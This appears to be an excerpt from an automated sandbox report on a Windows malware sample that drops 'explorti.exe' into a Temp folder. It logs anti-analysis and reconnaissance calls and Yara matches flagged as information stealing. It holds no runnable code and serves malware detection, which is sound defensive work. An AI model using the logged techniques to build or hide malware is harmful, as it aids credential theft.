Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00EC643B mov eax, dword ptr fs:[00000030h] 7_2_00EC643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00ECA1A2 mov eax, dword ptr fs:[00000030h] 7_2_00ECA1A2
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: explorti.exe, explorti.exe, 00000007.00000002.2881101334.0000000001074000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: yHProgram Manager
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00EAD2E8 cpuid 7_2_00EAD2E8
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00EACAED GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 7_2_00EACAED
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 7_2_00E96590 LookupAccountNameA, 7_2_00E96590

Stealing of Sensitive Information

Source: Yara match File source: 7.2.explorti.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.gNo9ad9KO4.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.explorti.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.explorti.exe.e90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1640045336.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1665651650.0000000004990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2319286062.0000000004810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1720834507.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1706078385.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1680219093.0000000000161000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1680559275.0000000005660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY